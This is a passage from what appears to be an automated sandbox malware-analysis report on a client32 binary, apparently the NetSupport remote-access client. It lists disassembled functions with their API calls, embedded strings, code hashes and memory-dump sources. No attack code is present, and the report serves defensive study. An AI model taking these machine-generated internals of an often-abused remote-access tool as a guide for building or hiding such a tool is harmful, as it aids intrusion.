                                                                                  • API ID: Window$DeferEqualPointsRect
                                                                                  • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                  • API String ID: 2754115966-2830328467
                                                                                  • Opcode ID: b6d19f504f75df2a93f1157cb60ab9b52a693478c141313c6b39b5393ddf6f55
                                                                                  • Instruction ID: 7762f9a6a2ed7d341f2943c2e7d232384b1531e6a197bbc7c1a3da1ffe608ad4
                                                                                  • Opcode Fuzzy Hash: b6d19f504f75df2a93f1157cb60ab9b52a693478c141313c6b39b5393ddf6f55
                                                                                  • Instruction Fuzzy Hash: 74414B74A006099FDB14CF98C885EAABBF5FF48704F108569EA55AB344DB70A800CFA4
                                                                                  Function 11049690 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 106COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _malloc.LIBCMT ref: 1104971C
                                                                                  • _free.LIBCMT ref: 11049779
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  • CLTCONN.CPP, xrefs: 11049708
                                                                                  • ReleaseSmartcardDevice called, xrefs: 110496BD
                                                                                  • idata->pSmartcardDevice == theSmartcardDevice, xrefs: 1104970D
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorExitLastMessageProcess_free_mallocwsprintf
                                                                                  • String ID: CLTCONN.CPP$ReleaseSmartcardDevice called$idata->pSmartcardDevice == theSmartcardDevice
                                                                                  • API String ID: 3300666597-3188990991
                                                                                  • Opcode ID: a96d33cc2ee08905e30f1eec18a566e6825b27c160358a4790fc3fe5e536e1e6
                                                                                  • Instruction ID: e35be207329a9a02e71ffc0183289b31f5ea9fbf546850573bb4cc18e029b419
                                                                                  • Opcode Fuzzy Hash: a96d33cc2ee08905e30f1eec18a566e6825b27c160358a4790fc3fe5e536e1e6
                                                                                  • Instruction Fuzzy Hash: D041AEB5A01611AFD704CF98D880EAAFBE4FB48328F6142BDE52997350E730A940CB95
                                                                                  Function 110BD470 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetMenu.USER32(?), ref: 110BD4A4
                                                                                  • GetSubMenu.USER32(00000000,00000002), ref: 110BD4E5
                                                                                  • DrawMenuBar.USER32(?), ref: 110BD50D
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110BD48E
                                                                                  • m_hWnd, xrefs: 110BD493
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Menu$DrawErrorExitLastMessageProcesswsprintf
                                                                                  • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                  • API String ID: 381722633-2830328467
                                                                                  • Opcode ID: 0cf4c9e9231e7294a34ea0469e29db66948a84948ca199a1ba082523d671b7b5
                                                                                  • Instruction ID: 2ed85e2a360b3d02c99ae53d45e4f65cdbccb9b7267b746ab424cefae630bdcb
                                                                                  • Opcode Fuzzy Hash: 0cf4c9e9231e7294a34ea0469e29db66948a84948ca199a1ba082523d671b7b5
                                                                                  • Instruction Fuzzy Hash: 9B1151BAE00219AFCB04DFA5C894CAFF7B9BF49308B00457EE11697254DB74AD05CB94
                                                                                  Function 1102D750 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetVersion.KERNEL32(?,1113A2AB,00000001,00000001,Audio,HookDirectSound,00000000,00000000), ref: 1102D75C
                                                                                  • InterlockedIncrement.KERNEL32(111EE418), ref: 1102D799
                                                                                  • InterlockedDecrement.KERNEL32(111EE418), ref: 1102D7C0
                                                                                  Strings
                                                                                  • EnableAudioHook(%d, %d), gCount=%d, xrefs: 1102D77F
                                                                                  • SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Enum, xrefs: 1102D7A6, 1102D7CC
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Interlocked$DecrementIncrementVersion
                                                                                  • String ID: EnableAudioHook(%d, %d), gCount=%d$SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Enum
                                                                                  • API String ID: 1284810544-229394064
                                                                                  • Opcode ID: fe3dc48e698ffd4a8d7334cc8b8c209b51da527230acf53cf6ffc60aeaae577d
                                                                                  • Instruction ID: 926408d456050aac1ce0bfa7cc5ec849c80561d93592d3bffa921dc6a50aec96
                                                                                  • Opcode Fuzzy Hash: fe3dc48e698ffd4a8d7334cc8b8c209b51da527230acf53cf6ffc60aeaae577d
                                                                                  • Instruction Fuzzy Hash: 8801DB3AE425A956E70299D56C84F9DB7E9BF8162DFC00071FD2DD2A04F725A84043F1
                                                                                  Function 11093410 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44registrywindowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetClassInfoA.USER32(1109350C,NSMClassList,?), ref: 11093424
                                                                                  • LoadIconA.USER32(1109350C,00002716), ref: 11093456
                                                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 11093465
                                                                                  • RegisterClassA.USER32(?), ref: 11093483
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ClassLoad$CursorIconInfoRegister
                                                                                  • String ID: NSMClassList
                                                                                  • API String ID: 2883182437-2474587545
                                                                                  • Opcode ID: ed1d21c8b0e5febffb489e055e1c54f1fef417e553f3d38ad2266ee313231f99
                                                                                  • Instruction ID: fe778f9fdd97d031227fa6c3481e124fd7af1bb38caa6574b8637058aa02c9a3
                                                                                  • Opcode Fuzzy Hash: ed1d21c8b0e5febffb489e055e1c54f1fef417e553f3d38ad2266ee313231f99
                                                                                  • Instruction Fuzzy Hash: D2015AB1D4522DABCB00CF9A99489EEFBFCEF98315F00415BE424F3240D7B556518BA5
                                                                                  Function 11145660 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadStringA.USER32(00000000,00000000,?,11112FE6), ref: 11145678
                                                                                  • wsprintfA.USER32 ref: 1114568E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LoadStringwsprintf
                                                                                  • String ID: #%d$..\ctl32\util.cpp$i < cchBuf
                                                                                  • API String ID: 104907563-3240211118
                                                                                  • Opcode ID: 188e66dcb4f495cccd276ddbe85c9828130f8f7e32c029e7730bc87656a10fbf
                                                                                  • Instruction ID: 8140d2e7eee7513769b3ba4dad54de8c0dbe44583bb89c450ccda0d540df1705
                                                                                  • Opcode Fuzzy Hash: 188e66dcb4f495cccd276ddbe85c9828130f8f7e32c029e7730bc87656a10fbf
                                                                                  • Instruction Fuzzy Hash: 09F0F6BAA002267BDA008A99EC85DDFFB5CDF4469C7404025F908C7600EA30E800C7A9
                                                                                  Function 11145450 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?,11037F05), ref: 11145463
                                                                                  • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11145475
                                                                                  • FreeLibrary.KERNEL32(00000000,?,11037F05), ref: 11145485
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                  • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                  • API String ID: 145871493-545709139
                                                                                  • Opcode ID: d9714682fd572e4dd61365fd2dfa7814b888b2e8bab1e0a3a5dbf5644fcdd9a2
                                                                                  • Instruction ID: e6235b5ae6f1dfca5c3043155b5dfa22c054f7606e96d7ad1ec578fde494cc77
                                                                                  • Opcode Fuzzy Hash: d9714682fd572e4dd61365fd2dfa7814b888b2e8bab1e0a3a5dbf5644fcdd9a2
                                                                                  • Instruction Fuzzy Hash: A1F0A7317021744FE3568AB69F84AAEFAD5EB81B7AB190135E430CAA98E73488408765
                                                                                  Function 110ED0D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsWindow.USER32(00000000), ref: 110ED0D9
                                                                                  • SendMessageA.USER32(00000000,0000045B,11020C43,00000000), ref: 110ED10D
                                                                                  • SendMessageA.USER32(00000000,00000445,00000000,04000000), ref: 110ED11C
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Message$Send$ErrorExitLastProcessWindowwsprintf
                                                                                  • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)
                                                                                  • API String ID: 2446111109-1196874063
                                                                                  • Opcode ID: 93f24dbc4e032974f58e80ca0bca6baec86c89681a163379e751775f02966cce
                                                                                  • Instruction ID: de22b858d700e942c4608c09a96d83abbd875fbcce216c0436bbd94e05821714
                                                                                  • Opcode Fuzzy Hash: 93f24dbc4e032974f58e80ca0bca6baec86c89681a163379e751775f02966cce
                                                                                  • Instruction Fuzzy Hash: 75E0D82978027837D52176926C0AFDF7B5CCB85A55F058021FB15BB0C1D560730146ED
                                                                                  Function 11017420 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindWindowA.USER32(IPTip_Main_Window,00000000), ref: 11017428
                                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 11017437
                                                                                  • PostMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 11017458
                                                                                  • SendMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 1101746B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessageWindow$FindLongPostSend
                                                                                  • String ID: IPTip_Main_Window
                                                                                  • API String ID: 3445528842-293399287
                                                                                  • Opcode ID: 00a8c747fde22ab102a93d32433fce56b25fb468ef9c10acfd2dcd85990a41f8
                                                                                  • Instruction ID: 34ac11834c9c2e389a15be58e88483fc622eca852c0d3e073bf1a838df65f62f
                                                                                  • Opcode Fuzzy Hash: 00a8c747fde22ab102a93d32433fce56b25fb468ef9c10acfd2dcd85990a41f8
                                                                                  • Instruction Fuzzy Hash: A6E0DF38AC1B7973F23916204E5AFCA79458B00B20F100150FB32BC9C98B9894009698
                                                                                  Function 110CF7D0 Relevance: 7.6, APIs: 5, Instructions: 87COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 110CEDF0: EnterCriticalSection.KERNEL32(00000000,00000000,50D94AA1,00000000,00000000,00000000,110CF110,?,00000001), ref: 110CEE2A
                                                                                    • Part of subcall function 110CEDF0: LeaveCriticalSection.KERNEL32(00000000), ref: 110CEE92
                                                                                  • IsWindow.USER32(?), ref: 110CF82B
                                                                                    • Part of subcall function 110CC330: GetCurrentThreadId.KERNEL32 ref: 110CC339
                                                                                  • RemovePropA.USER32(?), ref: 110CF858
                                                                                  • DeleteObject.GDI32(?), ref: 110CF86C
                                                                                  • DeleteObject.GDI32(?), ref: 110CF876
                                                                                  • DeleteObject.GDI32(?), ref: 110CF880
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DeleteObject$CriticalSection$CurrentEnterLeavePropRemoveThreadWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1921910413-0
                                                                                  • Opcode ID: e7ee2ccd0990f0a239e7a4ad568e4e99a575b0a85c9cc50c84e6834965f63a82
                                                                                  • Instruction ID: ad97ac124b8baf06b1bc187428558142c09e0612fd1a0aa1ed86d22d24e6cfad
                                                                                  • Opcode Fuzzy Hash: e7ee2ccd0990f0a239e7a4ad568e4e99a575b0a85c9cc50c84e6834965f63a82
                                                                                  • Instruction Fuzzy Hash: 0C316BB1A007559BDB20DF69D940B5BBBE8EB04B18F000A6DE862D3690D775E404CBA2
                                                                                  Function 11081590 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 86COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  • m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}, xrefs: 11081647
                                                                                  • %02x, xrefs: 11081610
                                                                                  • ..\CTL32\DataStream.cpp, xrefs: 1108165E
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
